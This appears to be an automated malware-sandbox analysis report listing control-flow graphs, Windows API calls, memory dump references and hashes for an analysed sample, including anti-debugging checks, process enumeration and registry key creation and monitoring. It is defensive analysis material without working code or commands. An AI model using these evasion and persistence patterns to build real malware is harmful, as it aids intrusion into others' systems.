                                                                                                                                                                                                                                                                                            • API String ID: 741273618-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: e6f446bafcb95174e754699b5b4cd8f241692154314fb655b45f77f516336076
                                                                                                                                                                                                                                                                                            • Instruction ID: 5fcbc5d5a54a32df17b6c8308d6099b796610362a3d3ddb3b9150f03c55dbc82
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6f446bafcb95174e754699b5b4cd8f241692154314fb655b45f77f516336076
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7412FB0A0021D9BDB19CF58C8517DEF7B5EF98304F00819AE60967290D7B56EC0CF91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435153
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0143518F
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000400), ref: 014351D1
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0143543A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue$Closewsprintf
                                                                                                                                                                                                                                                                                            • String ID: userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 3301640424-3509716881
                                                                                                                                                                                                                                                                                            • Opcode ID: 76e558de3b1a7c58c9e26562acfeef9ba75d2e4df4147cd543759abf866539cb
                                                                                                                                                                                                                                                                                            • Instruction ID: bb217cf1dede78e1640abcbe0ebf1ee59eeb6c34c8e42bfccf54894c80de3ddb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e558de3b1a7c58c9e26562acfeef9ba75d2e4df4147cd543759abf866539cb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70F049719011289BEB30CF14CD80FEAF378FB98705F0842DAE629A6154C7329B98CF54

Execution Graph

Execution Coverage: 55.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 199
Total number of Limit Nodes: 9

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 284 976111-97611c 285 976154-9761ce 284->285 286 97611e 284->286 287 976123-976152 call 97157d * 2 Sleep 286->287 287->285
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8291e7eba025b2cabe6cb1a418f1368c971f54f357b78bae2338faacba5cf7b6
                                                                                                                                                                                                                                                                                            • Instruction ID: 0aafcfac7871cd65317dfac5908e8e96c147f5a193059b9ffdc168e1f29481ea
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8291e7eba025b2cabe6cb1a418f1368c971f54f357b78bae2338faacba5cf7b6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41110473A146114BFB1CDF25EC4A9667392EBD435031A403FE62A9B395CEB06943D780

Control-flow Graph

APIs
  • Part of subcall function 00971000: RegOpenKeyExW.KERNEL32(80000001,00000000,00000000,00020019,00971318,?,?,?,?,?,00971318), ref: 00971036
• CheckRemoteDebuggerPresent.KERNEL32(00000009,?), ref: 009713E5
• Sleep.KERNEL32(000001F4), ref: 00971409
• EnumWindows.USER32(00971081,00000000), ref: 0097144A
• Sleep.KERNEL32(00000000), ref: 00971468
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
• Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: Sleep$CheckDebuggerEnumOpenPresentRemoteWindows
• String ID:
• API String ID: 3279035243-0
• Opcode ID: d8cdb8aa33a0326ddc6771819b4584f6d3819c0c9449abd34a97ca28b4402c07
• Instruction ID: 4ad712cba2ef12f057bcbc4da2991d8e37ae521631d5d65ecd6053a98a191dce
• Opcode Fuzzy Hash: d8cdb8aa33a0326ddc6771819b4584f6d3819c0c9449abd34a97ca28b4402c07
• Instruction Fuzzy Hash: 04318673C04309AFEF14AFE8DC46BADBB78EF80314F608459F4196A192DB759A81CB54

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 83 9711d6-971241 call 976690 call 97157d QueryDosDeviceW 88 971243-971260 call 975307 83->88 89 9712aa-9712b1 83->89 92 971262-971275 call 97157d QueryDosDeviceW 88->92 93 9712a1-9712a4 call 97538c 88->93 98 971277-97127e call 971eaa 92->98 99 971290-97129f call 976413 92->99 96 9712a9 93->96 96->89 104 971280-971284 98->104 99->92 99->93 105 971286 104->105 106 97128a-97128e 104->106 105->106 106->99 106->104
APIs
• QueryDosDeviceW.KERNEL32(00000000,?,00020000,0F4D8B55,2FA62CA8), ref: 0097123D
  • Part of subcall function 00975307: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,009760A1,00000104), ref: 00975324
• QueryDosDeviceW.KERNEL32(?,?,00000104), ref: 00971271
Strings
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
• Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: DeviceQuery$AllocVirtual
• String ID: ^;yN
• API String ID: 1362681402-1295057876
• Opcode ID: 0bc3cb7fd173ad837db7d36987d4d99e37398282e0fa367c0b50b7a074e2e6bf
• Instruction ID: 84024afbc33304064131bafe0353e31bf9febf79029d199453c95854b5b5309f
• Opcode Fuzzy Hash: 0bc3cb7fd173ad837db7d36987d4d99e37398282e0fa367c0b50b7a074e2e6bf
• Instruction Fuzzy Hash: 4621C9329043186BEB159B98D8427EEBBB8DF80710F108099E10DB6182DBB59BC5CBE5

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 107 9761f3-97622d call 97157d RegOpenKeyExW 110 97622f-976260 call 975307 call 97157d RegQueryValueExW 107->110 111 97629b-9762a0 107->111 116 976275-976278 110->116 117 976262-97626f call 976437 110->117 119 97627e-97629a call 97538c call 97157d RegCloseKey 116->119 120 97627a 116->120 117->119 123 976271 117->123 119->111 120->119 123->116
APIs
• RegOpenKeyExW.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 00976229
  • Part of subcall function 00975307: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,009760A1,00000104), ref: 00975324
• RegQueryValueExW.KERNEL32(?,00000001,00000000,00000001,00000000,?,00000000), ref: 0097625A
• RegCloseKey.KERNEL32(?), ref: 00976298
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
• Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: AllocCloseOpenQueryValueVirtual
• String ID:
• API String ID: 1821833669-0
• Opcode ID: 9b49e9f60a9ec9610da77b54217cf26d6b6ac94f0bae5f2632ec3b90213a48c1
• Instruction ID: a4186bcf22a410cd82694ba9ce935f97f7c0a4fc103200f6d13c418f143d9bca
• Opcode Fuzzy Hash: 9b49e9f60a9ec9610da77b54217cf26d6b6ac94f0bae5f2632ec3b90213a48c1
• Instruction Fuzzy Hash: 32110673804354BBEF15ABA4CC02FEE7B789F81320F00404DFA547A1D1DAB16A40C795

Control-flow Graph

APIs
• RegOpenKeyExW.KERNEL32(?,?,00000000,00020006,?,00000000,?,?,00975FDB,?,?,?), ref: 0097635A
• RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,?,00975FDB,?,?,?), ref: 009763B2
  • Part of subcall function 009760EC: RegSetValueExW.KERNEL32(?,?,00000000,00000001,00000000,00976086,?,00976086,00000000,?,?,00000000), ref: 0097610D
• RegCloseKey.KERNEL32(?,?,?,00975FDB,?,?,?), ref: 0097638A
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
• Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: CloseCreateOpenValue
• String ID:
• API String ID: 776291540-0
• Opcode ID: e3550ae643fd1e613060dac188b79bad373e7de9ca31b7b50b9d14ad0f125583
• Instruction ID: 6a1b19f592c8c784f6a068be9b70a110c034d6cb113f4917991c4607ff6506d1
• Opcode Fuzzy Hash: e3550ae643fd1e613060dac188b79bad373e7de9ca31b7b50b9d14ad0f125583
• Instruction Fuzzy Hash: 1E017173504224BAEF196BA1DC07EEF3F5DDF913A0F108054BA1E55091E9719F00E6A0

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009761F3: RegOpenKeyExW.KERNEL32(?,?,00000000,00000001,?,00000000), ref: 00976229
                                                                                                                                                                                                                                                                                              • Part of subcall function 009761F3: RegQueryValueExW.KERNEL32(?,00000001,00000000,00000001,00000000,?,00000000), ref: 0097625A
                                                                                                                                                                                                                                                                                              • Part of subcall function 009761F3: RegCloseKey.KERNEL32(?), ref: 00976298
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(?,?,00000000,000F003F,?), ref: 00976001
                                                                                                                                                                                                                                                                                              • Part of subcall function 00976335: RegOpenKeyExW.KERNEL32(?,?,00000000,00020006,?,00000000,?,?,00975FDB,?,?,?), ref: 0097635A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00976335: RegCloseKey.KERNEL32(?,?,?,00975FDB,?,?,?), ref: 0097638A
                                                                                                                                                                                                                                                                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000001,0000000F,?,00000001), ref: 00976053
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: Open$CloseValue$ChangeNotifyQuery

Control-flow Graph

APIs
• RegQueryValueExW.KERNEL32(?,00000104,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 009762D9
• RegCloseKey.KERNEL32(850FC084), ref: 0097632B
  • Part of subcall function 00975307: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,009760A1,00000104), ref: 00975324
  • Part of subcall function 0097538C: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00971DBA,00000000), ref: 009753AD
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: Virtual$AllocCloseFreeQueryValue

Control-flow Graph (figure; legend: Executed / Not Executed)
• Graph covers function 975870-9758ea; basic blocks call 97157d, CreateToolhelp32Snapshot, Process32FirstW, 971e8c and 972371
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,2FA62CA8,00000001), ref: 0097588E
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 009758D4
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: CreateFirstProcess32SnapshotToolhelp32

Control-flow Graph (figure; legend: Executed / Not Executed)
• Graph covers function 9758eb-975967; basic blocks call 97157d, CreateToolhelp32Snapshot, Module32FirstW, 971e8c and 972371
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000018,?,00000000,00000001), ref: 0097590B
• Module32FirstW.KERNEL32(00000000,?), ref: 00975951
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 357197d89d52abd3f29020b04f55bfe24ce485d8ba99c4db5683c468fd36aba3
                                                                                                                                                                                                                                                                                            • Instruction ID: daa9f19dcca36d08bf6a5c38f1d47ff2df1520fe11ebc8f446cbefd87e85b525
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 357197d89d52abd3f29020b04f55bfe24ce485d8ba99c4db5683c468fd36aba3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5F07D73601524BAEB8466746C87FDE3388CB45330FA0C54AF76DAB0C0EDA49EC485B9

Control-flow Graph (graph image not included; basic blocks and edges recovered from the graph text)
• Blocks: 9757f2-97582d (call 97157d * 2); 97582f-975852 (call 97157d, GetTokenInformation); 975854-975857; 97585a-97585e; 975860-975863 (call 972371); 975868; 975869-97586f
• Edges: 9757f2->97582f; 9757f2->97585a; 97582f->97585a; 97582f->975854; 975854->97585a; 97585a->975860; 97585a->975869; 975860->975868; 975868->975869
APIs
• GetTokenInformation.KERNELBASE(?,00000014,?,00000004,?), ref: 0097584E
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
• Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: d8a4bbbb5f8426e0d5f995984f0fc0db44f0f6428f5c82ae09fc5190f37a0e84
• Instruction ID: 494554889a7a46a6ea64acfafdbf2846fdace1247cd300974737f348e0f80c10
• Opcode Fuzzy Hash: d8a4bbbb5f8426e0d5f995984f0fc0db44f0f6428f5c82ae09fc5190f37a0e84
• Instruction Fuzzy Hash: E6019273900205BFDB18ABA49C43EEE777CDF80720F20816EF225660D1EDB0AB45D660

Control-flow Graph (graph image not included; basic blocks and edges recovered from the graph text)
• Blocks: 971000-97103a (call 9729e2, call 972bd5, call 97157d, RegOpenKeyExW); 97103c-97103e; 971040-971044 (call 9762a1); 971049-97104a; 97104c-971055 (call 976402); 971057-971061 (call 971f03); 971063; 971065-971080 (call 97538c * 3)
• Edges: 971000->971040; 971000->97103c; 971040->971049; 971049->97104c; 97103c->97104c; 97104c->971057; 97104c->971065; 971057->971065; 971057->971063; 971063->971065
APIs
• RegOpenKeyExW.KERNEL32(80000001,00000000,00000000,00020019,00971318,?,?,?,?,?,00971318), ref: 00971036
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
• Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 3630a4357397e900909c082e122381b7b67141189cd201311aa313e504ddd299
• Instruction ID: fb5b4d96d3a5f46a10e5bdb0ca93ab7c4ad5b14312f386e52396c5e4187a2ea1
• Opcode Fuzzy Hash: 3630a4357397e900909c082e122381b7b67141189cd201311aa313e504ddd299
• Instruction Fuzzy Hash: 4FF0A423A502146BDB2873786C47FEF179C4BC27A0F20442EF50DEB192ED95D9458174

Control-flow Graph (graph image not included; basic blocks and edges recovered from the graph text)
• Blocks: 9714fc-971512 (call 9714ba); 971514-971538; 97153a; 97153d-97154f (call 971ed5); 971551-97155a; 97155c; 97155e-97156d; 97156f-971571; 971573-971576 (LoadLibraryA); 971578-971579; 97157a-97157c
• Edges: 9714fc->971514; 9714fc->97157a; 971514->97153d; 97153d->971551; 97153d->97155e; 971551->97155c; 971551->97153a; 97155e->971573; 97155e->97156f; 97155c->97156f; 97153a->97153d; 971573->971578; 97156f->971578; 971578->97157a
APIs
• LoadLibraryA.KERNEL32(?,00000000,00000000,00000000), ref: 00971576
Memory Dump Source
• Source File: 0000000A.00000002.4017305653.0000000000971000.00000040.00000001.01000000.00000009.sdmp, Offset: 00970000, based on PE: true
• Associated: 0000000A.00000002.4015986318.0000000000970000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.0000000000978000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4018689660.000000000098C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.000000000098E000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B25000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B30000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000B32000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BA6000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4021603137.0000000000BB0000.00000040.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4044563723.0000000000D45000.00000080.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.4056247982.0000000000F8E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_970000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6e72f38f99c838cfc4fb8e9bffb4a9b87a33a1d28f34a7395b2a87c3341a6d0b
                                                                                                                                                                                                                                                                                            • Instruction ID: 8a5f206ec5ca9e960bade145df4504b5e5da93285e79d6ff9b73865733687b44
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e72f38f99c838cfc4fb8e9bffb4a9b87a33a1d28f34a7395b2a87c3341a6d0b
